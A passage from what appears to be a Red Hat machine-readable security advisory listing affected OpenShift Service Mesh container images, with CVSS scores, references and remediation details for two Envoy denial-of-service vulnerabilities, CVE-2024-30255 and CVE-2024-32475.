"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-30255", }, { category: "external", summary: "RHBZ#2272986", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272986", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-30255", url: "https://www.cve.org/CVERecord?id=CVE-2024-30255", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-30255", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-30255", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-j654-3ccm-vfmm", }, { category: "external", summary: "https://nowotarski.info/http2-continuation-flood/", url: "https://nowotarski.info/http2-continuation-flood/", }, { category: "external", summary: "https://www.kb.cert.org/vuls/id/421644", url: "https://www.kb.cert.org/vuls/id/421644", }, ], release_date: "2024-04-03T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood", }, { cve: "CVE-2024-32475", cwe: { id: "CWE-617", name: "Reachable Assertion", }, discovery_date: "2024-04-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2276149", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", 